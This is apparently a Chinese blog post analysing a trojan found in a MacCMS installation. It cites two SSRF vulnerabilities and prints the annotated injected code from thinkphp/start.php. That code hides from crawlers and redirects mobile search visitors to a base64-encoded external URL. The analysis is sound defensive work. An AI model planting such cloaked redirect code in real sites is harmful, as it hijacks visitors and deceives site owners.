苹果CMS被植入木马分析(Maccms)

近期网上有人追踪到 maccms 2025.1000.4050 版本有漏洞容易被人恶意利用

CVE-2025-10395

Magicblack MacCMS 2025.1000.4050 版本中发现一个漏洞。该漏洞影响组件“计划任务处理程序”的函数 col_url。对参数 cjurl 进行操作会导致服务器端请求伪造。攻击者可以利用该漏洞远程发起攻击。

参考：

• https://github.com/August829/Yu/blob/main/58ead8e7e08bfb017.md
• https://vuldb.com/?ctiid.323830
• https://vuldb.com/?id.323830
• https://vuldb.com/?submit.645798

CVE-2025-10397

Magicblack MacCMS 2025.1000.4050 中发现一个漏洞。该漏洞影响组件 API Handler 的未知部分。对参数 cjurl 的操纵会导致服务器端请求伪造。该攻击可远程发起。该漏洞利用代码已公开，可能被利用。

参考：

• https://github.com/August829/Yu/blob/main/58ead8e7e08bfb018.md
• https://vuldb.com/?ctiid.323832
• https://vuldb.com/?id.323832
• https://vuldb.com/?submit.645805

然后，我就中奖了

对方将木马植入到 thinkphp/start.php 里面

<?php
// +----------------------------------------------------------------------
// | ThinkPHP [ WE CAN DO IT JUST THINK ]
// +----------------------------------------------------------------------
// | Copyright (c) 2006~2018 http://thinkphp.cn All rights reserved.
// +----------------------------------------------------------------------
// | Licensed ( http://www.apache.org/licenses/LICENSE-2.0 )
// +----------------------------------------------------------------------
// | Author: liu21st <liu21st@gmail.com>
// +----------------------------------------------------------------------

namespace think;
$agentt = strtolower($_SERVER['HTTP_USER_AGENT']);          // 1. 取出 User-Agent 并转小写
if(stripos($agentt,'spider') == false && stripos($agentt,'bot')== false) {   // 2. 过滤掉爬虫/机器人（避免搜索引擎检测）
    if(stripos($agentt, 'ios') || stripos($agentt, 'android') || stripos($agentt, 'iphone') || stripos($agentt, 'ipad') || stripos($agentt, 'Harmony')) { // 3. 仅针对移动设备（包含 Harmony）
        $laiyuan=@strtolower($_SERVER['HTTP_REFERER']);   // 4. 取 Referer 并转小写
        if (stripos($laiyuan, 'baid') || stripos($laiyuan, 'bing') || stripos($laiyuan, 'sm') || stripos($laiyuan, 'so') || stripos($laiyuan, 'google') || stripos($laiyuan, 'Harmony'))  {
            $new_url=base64_decode('aHR0cHM6Ly9kZC5la2Njay5jb20vZG93bmxvYWQvNjQxM18wLmh0bWw='); // 5. base64 -> 跳转目标
            header("Location:$new_url");   // 6. 服务器端 302/301 跳转（立即跳走）
            exit;                          // 7. 结束脚本，页面不会继续输出
        }   
    }
}
require __DIR__ . '/base.php';
App::run()->send()

这木马仅针对移动装置进行跳转，而且连鸿蒙系统都考虑进去